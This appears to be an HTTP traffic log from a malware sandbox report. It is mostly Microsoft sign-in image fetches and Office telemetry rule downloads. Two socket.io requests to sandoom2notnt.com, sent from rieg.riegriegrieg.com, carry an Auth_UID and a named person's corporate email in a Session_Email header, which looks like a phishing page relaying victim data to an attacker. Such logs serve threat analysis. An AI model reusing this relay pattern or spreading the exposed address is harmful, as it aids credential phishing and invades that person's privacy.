          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PB7bdZX HTTP/1.1Host: sandoom2notnt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Auth_UID: USER09102024U44100921Session_Email: gulamrasul.chepuwala@cevalogistics.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://rieg.riegriegrieg.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rieg.riegriegrieg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=JMhweoIWN1gqZtHIAAXf HTTP/1.1Host: sandoom2notnt.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://rieg.riegriegrieg.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 0b57MZGac31qPTryDxyZmw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
